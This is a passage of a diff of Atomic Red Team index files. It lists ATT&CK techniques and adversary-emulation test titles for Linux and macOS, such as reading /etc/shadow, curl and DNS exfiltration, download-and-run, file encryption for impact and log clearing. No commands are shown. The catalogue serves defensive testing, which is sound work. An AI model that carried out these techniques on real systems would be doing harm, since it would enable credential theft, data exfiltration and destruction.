- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
- Atomic Test #3: Access /etc/{shadow,passwd} with a standard bin that's not cat [linux]
- Atomic Test #4: Access /etc/{shadow,passwd} with shell builtins [linux]
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #3: System Service Discovery - systemctl [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #2: Network Share Discovery - linux [linux]
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- Atomic Test #24: Linux List Kernel Modules [linux]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #4: Examine password expiration policy - All Linux [linux]
- T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# command-and-control
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- Atomic Test #27: Linux Download File and Run [linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
- Atomic Test #6: Shutdown System via `halt` - Linux [linux]
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
# execution
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- Atomic Test #3: Harvest SUID executable files [linux]
- Atomic Test #4: LinEnum tool execution [linux]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
- Atomic Test #3: Execute Python via Python executables (Linux) [linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
# initial-access
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
atomics/Indexes/Indexes-Markdown/macos-index.md
-686
View File
@@ -1,686 +0,0 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1143 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: Chmod through c script [macos, linux]
- Atomic Test #11: Chown through c script [macos, linux]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- [T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.001 Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
